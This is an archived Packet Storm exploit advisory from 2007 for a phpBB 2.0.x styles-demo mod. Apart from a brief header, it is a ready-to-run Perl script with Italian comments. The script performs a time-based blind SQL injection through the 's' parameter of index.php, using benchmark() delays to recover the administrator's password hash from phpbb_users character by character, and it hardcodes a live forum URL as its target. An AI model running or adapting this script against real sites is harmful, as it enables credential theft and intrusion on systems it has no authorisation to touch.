phpbbstyles-sql.txt

2007-09-19T00:00:00
ID PACKETSTORM:59406
Type packetstorm
Reporter inj3ct-it.org
Modified 2007-09-19T00:00:00

Description

                                        
                                            `#---------------------------------------------------------------  
# ____ __________ __ ____ __   
#/_ | ____ |__\_____ \ _____/ |_ /_ |/ |_   
# | |/ \ | | _(__ <_/ ___\ __\ ______ | \ __\  
# | | | \ | |/ \ \___| | /_____/ | || |   
# |___|___| /\__| /______ /\___ >__| |___||__|   
# \/\______| \/ \/   
#---------------------------------------------------------------  
#  
#Http://www.inj3ct-it.org Staff[at]inj3ct-it[dot]org   
#  
#--------------------------------------------------------------  
#  
#Ktauber.com StylesDemo Mod for phpbb 2.0.xx Multiple Vulnerabilites  
#  
#---------------------------------------------------------------  
#  
# Coded by nexen  
#  
# GreetZ: Rossi46go for code   
#  
# Description:  
#  
#XSS and SQL Injection  
#  
#---------------------------------------------------------------  
#  
#  
#  
#  
#---------------------------------------------------------------  
#exploit.pl  
#---------------------------------------------------------------  
#  
#  
#  
use LWP::UserAgent;  
use HTTP::Request::Common;  
use Time::HiRes;  
######################################## CONFIGURAZIONE EXPLOIT ##########################################################################  
$sito = "http://www.forumup.com/stylesdemo/"; # insert vulnerable site as http://[site]/[path]/  
##########################################################################################################################################  
$var = "1";  
my $hash;  
@array = (48,49,50,51,52,53,54,55,56,57,97,98,99,100,101,102);  
  
sub richiesta {  
$var = $_[0];  
$ua = LWP::UserAgent->new;  
$inizio=Time::HiRes::time();  
$response = $ua->request(GET $var,  
s => $var);  
$response->is_success() || print("$!\n");  
$fine=Time::HiRes::time();  
$tempo=$fine-$inizio;  
return $tempo  
}  
  
sub aggiorna{  
system("cls");  
print "Tempo sql : " . $_[4] . " secondi\n";  
print "Hash : " . $_[3] . "\n";  
}  
  
#print richiesta;  
  
for ($i=1;$i<33;$i++)  
{  
for ($j=0;$j<16;$j++)  
{  
  
$var=$sito."index.php?s=(SELECT IF((ASCII(SUBSTRING(`user_password`,".$i.",1))=".$array[$j]."),benchmark(200000000,CHAR(0)),0) FROM phpbb_users WHERE `user_id`=2)/*";  
$tempo=richiesta($var);  
aggiorna($host,$tempodefault,$j,$hash,$tempo,$i);  
if($tempo>9)  
{  
$tempo=richiesta($var);  
aggiorna($host,$tempodefault,$j,$hash,$tempo,$i);  
if($tempo>9)  
{  
$hash .=chr($array[$j]);  
aggiorna($host,$tempodefault,$j,$hash,$tempo,$i);  
$j=200;  
}  
}  
  
}  
if($i==1)  
{  
if($hash eq "")  
{  
$i=200;  
print "Attacco Fallito Sito Fixato\n";  
}  
}  
}  
  
  
print "Attacco Terminato\n\n";  
  
system("pause");  
`